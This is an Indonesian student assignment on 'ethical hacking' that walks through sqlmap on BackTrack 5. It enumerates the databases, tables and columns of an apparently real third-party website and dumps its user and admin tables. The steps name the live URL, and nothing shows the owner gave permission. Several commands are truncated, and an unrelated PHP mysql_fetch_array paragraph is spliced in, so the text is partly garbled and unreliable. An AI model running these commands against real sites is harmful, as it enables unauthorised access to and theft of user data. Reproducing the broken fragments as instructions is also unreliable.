Nama : Hilwa Rodiah M. Hasan

NIM : 09523213

Ethical Hacking

Cara 1

Tool

sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini

menurut saya adalah tools sql injection yang free paling lengkap untuk saat ini, karena memang

kegunaan nya yang sangat simple untuk sekali attack sql injection.”

Mengambil record dari database Digunakan untuk melakukan pemrosesan hasil query yang dilakukan dengan perintah mysql_query(),

dan memasukkannya ke dalam array asosiatif, array numeris atau keduanya.

Sintaks :

$row = mysql_fetch_array($hasil); $row adalah array satu record dari record $hasil yang diproses nomor record

sesuai dengan nomor urut dari proses mysql_fetch_array yang sedang dilakukan.

$hasil adalah record set yang akan diproses.

Metode Dengan cara web yang vulnerable terhadap serangan sql injection.

Hasil

Cara 2 :

1. Buka sqlmap kalian pada BackTrack 5

>> Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2. Setelah terbuka, tuliskan syntax berikut ex= python sqlmap.py –u

3.

Keterangan :

-u = url

--dbs = untuk mencari nama databasenya.

Setelah ketemu nama databasenya yaitu="uselessj_uj2006" tuliskan syntax berikut ex=

python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 –

tables

4.

Keterangan :

-D = nama database yang sudah di temukan tadi

--tables = untuk mencari nama table

5. Nama table akan keluar dan hasilnya ternyata ada table user, untuk melihat isi kolomnya

tuliskan syntax berikut :

ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D

uselessj_uj2006 -T tbl_users –columns

6. Dianjutkan dengan ex= pytho sqlmap.py -u

fungsi dump untuk mengambil semua isi di table admin, hasil dump bisa diliat di direktori sqlmap

itu sendiri.

Tools : Backtrack 5